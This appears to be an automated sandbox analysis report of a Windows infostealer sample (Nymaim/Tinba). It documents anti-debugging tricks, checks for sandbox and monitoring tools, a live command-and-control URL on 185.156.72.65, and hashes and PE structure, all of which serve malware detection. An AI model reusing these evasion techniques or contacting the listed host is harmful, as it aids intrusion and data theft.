                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CD3 second address: 4A10D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F6C54B5854Dh 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F6C54B58558h 0x0000001d nop 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop edi 0x00000023 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473D32 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4711F6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 647A7E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473C64 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6AD707 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704171 rdtsc 0_2_00704171
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070920C sldt word ptr [eax]0_2_0070920C
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1010Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 813Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.4 %
                Source: C:\Users\user\Desktop\file.exe TID: 7872Thread sleep count: 65 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7872Thread sleep time: -130065s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 64 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 91 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7844Thread sleep count: 1010 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7844Thread sleep time: -2021010s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 92 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 93 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 100 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 89 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 114 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 93 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep count: 48 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7944Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7864Thread sleep count: 813 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7864Thread sleep time: -1626813s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0496798E FindFirstFileExW,0_2_0496798E
                Source: file.exe, file.exe, 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.3843100484.0000000005270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3841763949.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found potential dummy code loops (likely to delay analysis)
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704171 rdtsc 0_2_00704171
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_047A7D41 push dword ptr fs:[00000030h]0_2_047A7D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04950D90 mov eax, dword ptr fs:[00000030h]0_2_04950D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495092B mov eax, dword ptr fs:[00000030h]0_2_0495092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04959C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0495A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0495D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495A987 SetUnhandledExceptionFilter,0_2_0495A987
                Source: file.exe, file.exe, 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: jProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Process Injection                		351
                Virtualization/Sandbox Evasion                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory771
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager351
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync213
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe37%ReversingLabsWin32.Infostealer.Tinba
                file.exe47%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubY100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub9100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubI100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubXy100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubion100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkfile.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub9file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubIfile.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubYfile.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubifile.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubyfile.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubXyfile.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubionfile.exe, 00000000.00000002.3841763949.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.156.72.65
                      		unknownRussian Federation
                      		44636ITDELUXE-ASRUtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1565625
                      Start date and time:2024-11-30 10:40:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 55s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      04:41:30API Interceptor13609979x Sleep call for process: file.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.156.72.65file.exeGet hashmaliciousAmadey, NymaimBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 185.156.72.65/files/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                      • 185.156.72.65/files/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ITDELUXE-ASRUfile.exeGet hashmaliciousAmadey, NymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                      • 185.156.72.65

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.947478197450379
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:2'027'520 bytes
                      MD5:ac44247e8835b336845ad56b84583656
                      SHA1:ff499dadf0fd0f90d3e156ba2d521367678be35e
                      SHA256:e1a6fe984f3ffc681defb85678e20fb0fa1c4afe1a8e99dc974dc3253a04b371
                      SHA512:0a9476d193084f2232301734cb558b2e5bf56e59d73c2e6f418c51c0592e4b350e19855c3b4a7ca95c19fe071baf3ff097ee0b68077d9976f68600a0266f15d5
                      SSDEEP:49152:5t438z9pPZvbvzYHVD6z3kKipcwaYES6Zd6+u9rKHgYewg8SP:5t438zRbvQVD6gKiv5oWrAg3wTS
                      TLSH:7B9533263DE1DB3FC86AC1F89076E8E638917B90A5D392DD8518A735C53B18DBFE4021
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

                      File Icon

                      Icon Hash:cfa99b8a8651798d

                      Static PE Info

                      General

                      Entrypoint:0x8bf000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F6C54E190DAh
                      bswap esi
                      push ds
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [edx+ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      mov byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      and al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax], eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or byte ptr [eax+00000000h], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop ds
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax+eax*4], cl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2008 build 21022
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x4ba59c0x18goeehmfk
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x650000x3ae00952cdc556f7d72f0a693044663ae0ceaFalse0.9941779458598726data7.933164122793504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x660000x82340x3c001254adb667fecde1c39b82eed9a3eee2False0.9261067708333334data7.706464215665289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x700000x2a10000x200020bbad67020c29a915f162c78150562unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      goeehmfk0x3110000x1ad0000x1acc00e82572f730030f10a9c78c3c3727c60dFalse0.9919665634110787data7.950296707556539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      ukgkvxbu0x4be0000x10000x400c68b030b1b8e96c828e18e7377c6b7feFalse0.7138671875data5.743618334242075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x4bf0000x30000x22007b44e3663a580563880f19b13e39f761False0.07088694852941177DOS executable (COM)0.7854414732277604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_CURSOR0x664600xea8data1.0029317697228144
                      RT_CURSOR0x673080x8a8data1.0049638989169676
                      RT_CURSOR0x67bb00x568data1.0079479768786128
                      RT_CURSOR0x681180xea8data1.0029317697228144
                      RT_CURSOR0x68fc00x8a8data1.0049638989169676
                      RT_CURSOR0x698680x568data0.5195652173913043
                      RT_ICON0x4ba5fc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
                      RT_ICON0x4ba5fc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
                      RT_ICON0x4bacc40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
                      RT_ICON0x4bacc40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
                      RT_ICON0x4bd26c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
                      RT_ICON0x4bd26c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
                      RT_STRING0x6cea80x252emptyTamilIndia0
                      RT_STRING0x6cea80x252emptyTamilSri Lanka0
                      RT_STRING0x6d0fc0x396emptyTamilIndia0
                      RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
                      RT_STRING0x6d4940x520emptyTamilIndia0
